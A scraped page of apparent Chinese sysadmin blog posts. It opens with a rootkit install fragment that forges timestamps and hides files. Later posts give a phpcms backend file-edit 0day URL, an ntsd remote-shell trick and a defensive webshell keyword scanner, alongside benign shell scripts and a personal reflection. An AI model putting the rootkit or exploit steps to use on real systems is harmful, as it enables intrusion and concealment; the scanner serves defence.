#!/bin/sh

#install usb modules support

modprobe -r ehci-hcd

modprobe ehci-hcd

EOF

touch -amcr /bin/ls /etc/sysconfig/modules/ehci.modules

chmod 755 /etc/sysconfig/modules/ehci.modules

$HOMEDIR/tty h /etc/sysconfig/modules/ehci.modules > /dev/null 2>&1

##########check iptables setting##########

if [ -f /sbin/iptables ]; then

echo "`/sbin/iptables -L INPUT | head -5`"

else

echo ""

echo "# lucky for u no iptables found"

fi

##########start syslogd##########

/sbin/syslogd -m 0

# ./setup 123 3333 //设

2011-06-23

网络安全

php2008漏洞后台上传0day漏洞

phpcms扫描木马功能，发现木马后，可以查看修改。

只要指定文件可以查看，可以修改，也可以创建，很厉害的功能。

利用地址：

http://192.168.0.203/phpcms/admin.php?mod=phpcms&file=safe&action=see_code&files=uploadfile/test.php

2011-06-21

网络安全►Shell编程

scan webshell shell

#!/bin/bash

#scan webshell shell

dire=/data// # web path

exname=.php # .php; .jsp; .php3

key=eval # system; exec; base64_decode

page=$(find PATH -name "*.php" -type f ) #这样效率会更高，修改用find

#page=$(du -a $dire|awk '{print $2}'|grep $exname)

for i in $page

do

test=$(cat $i |grep -i $key)

if [ ! -z "$test" ]

then

echo $i >> tmp #

fi

done

网站被黑后，如果网站动态页面，很难一一搜索，通过搜索webshell 里面常用的关键词，来节省一段时间。

实现方法很简单，思路就是这样。

遍历整个目录下的文件，搜索特出关键词（webshell里面的敏感关键词），然后重定向到一个文件。在检查这些文件，就快的多了。

2011-06-20

Linux►Shell编程

vsftpd 服务脚本

#!/bin/bash

#by:key1088

#description:vsftpd

#conf:/etc/vsftpd/vsftp.conf

#cp vsftpd /etc/init.d/vsftpd

#chmod 755 /etc/init.d/vsftpd

#chkconfig --add vsftpd

#chkconfig vsftpd on

if [ -f /etc/init.d/functions ]

then

. /etc/init.d/functions

elif [ -f /etc/rc.d/init.d/functions ]

then

. /etc/rc.d/init.d/functions

else

exit 0

fi

vsftpd=/usr/local/sbin/vsftpd

ftpconf=/etc/vsftpd/vsftpd.conf

prog=vsftpd

RETVAL=0

start() {

if [ -n "`/sbin/pidof $prog`" ]

then

echo "$prog: already running"

return 1

fi

echo "Starting $prog:"

base=$prog

$vsftpd $ftpconf&

if [ -z "`/sbin/pidof $prog`" ]

then

RETVAL=1

fi

if [ $RETVAL -ne 0 ]

then

echo "Startup failure"

else

echo "Startup success"

fi

return $RETVAL

}

stop() {

if [ -z "`/sbin/pidof $prog`" ]

then

RETVAL=1

fi

if [ $RETVAL -ne 0 ]

then

echo "vsftpd no have run"

else

echo "Stopping $prog:"

killall $vsftpd

RETVAL=$?

if [ $RETVAL -ne 0 ]

then

echo "Shutdown failure"

else

echo "Shutdown success"

fi

}

case "$1" in

start)

start

;;

stop)

stop

;;

status)

status $vsftpd

RETVAL=$?

;;

restart)

stop

start

;;

*)

echo "Usage: $prog {start|stop|restart|status}"

exit 1

esac

exit $RETVAL

2011-06-15

Linux

linux 文件、目录写保护

文件：

[root@book ~]# touch a.txt

[root@book ~]# chattr +i a.txt
[root@root ~]# rm -f a.txt
rm: cannot remove `a.txt': Operation not permitted
[root@book ~]# ls
anaconda-ks.cfg a.txt Desktop install.log install.log.syslog
[root@book ~]# chattr -i a.txt
[root@book ~]# rm -f a.txt
[root@book ~]# ls
anaconda-ks.cfg Desktop install.log install.log.syslog

[root@root root]# mkdir test
[root@root root]# chattr +i test

[root@root root]# rm -fr test

rm: cannot remove directory `test': Operation not permitted

2011-05-21

生活感想

浮躁的天，浮躁的我。

看了几位大牛的blog，发现自己太浮躁的了，太没有耐心了。想到什么做什么，没有一点计划性。但往往计划了，却不去坚持。

记得，高中读狼图腾的时候，发现狼为了，捕捉猎物。会一动不动，等待几个小时。一旦时机成熟，立马去行动。狼一直是我崇拜的偶像，

耐性要改一改了。如果人重复去做单一的事情，他就不是很简单，而我现在做不到。工作终于辞职下来了，看了看网上的招聘信息。linux方面，真的很少的。也许不是一个招聘的季节，也许不是一个做技术的城市。迷茫中、换工作，还是转城市。还是、、、、

2011-05-17

网络安全

ntsd 应用技巧

远程机:ntsd -server tcp:port=1234 calc.exe

本机:ntsd -remote tcp:server=IP,port=1234

.shell

命令

2011-04-29

Shell编程

shell 中$() 、 ${} and $(()) 用法

脚本如下：

#!/bin/bash
#test $() and ${} and $(()) useges
#by:key1088@163.com
#mail:key1088@163.com

file=$(pwd)
echo $file
echo
echo '${file#*/}'
echo ${file#*/}
echo

echo '${file##*/}'
echo ${file##*/}
echo

echo '$(file%/*)'
echo ${file%%/*}
echo

echo '${file/cis7/cis8/}'
echo ${file/cis7/cis8/}
echo

echo '${file//cis7/cis8/}'
echo ${file//cis7/cis8/}
echo

echo '${file:0:5}'
echo ${file:0:5}
echo

echo '${file:5:5}'
echo ${file:5:5}
echo

echo '$(#file)'
echo $

Teilen Kommentare

key1088 Blog

2020到2060会发生什么，这40年内会有哪些变化呢

MAFIX - Linux 2.6 rootkit分析

Linux下rootkit-ddrk攻击获得root权限以及清除方法[转]

php2008漏洞后台上传0day漏洞

scan webshell shell

vsftpd 服务脚本

linux 文件、目录写保护

浮躁的天，浮躁的我。

ntsd 应用技巧

shell 中$() 、 ${} and $(()) 用法

mysqld守护脚本